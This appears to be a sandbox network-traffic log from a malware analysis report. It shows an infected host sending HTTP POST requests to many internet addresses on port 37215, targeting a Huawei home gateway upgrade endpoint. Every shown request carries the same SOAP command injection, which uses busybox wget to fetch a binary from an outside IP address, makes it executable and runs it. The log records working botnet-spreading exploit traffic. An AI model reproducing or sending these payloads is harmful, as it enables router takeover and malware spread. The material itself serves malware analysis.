                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              471192.168.2.1554900157.123.66.15937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719882011 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              472192.168.2.1556964222.195.107.9137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719928026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              473192.168.2.155846045.57.185.17737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719939947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              474192.168.2.154969445.30.135.25037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719954967 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              475192.168.2.153375845.14.106.19537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719974995 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              476192.168.2.1557280122.134.252.10937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.719993114 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              477192.168.2.153718837.113.111.19137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720021009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              478192.168.2.1547000122.169.179.21037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720021009 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              479192.168.2.155391845.161.147.9837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720056057 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              480192.168.2.1542500157.162.219.22037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:13.720098972 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
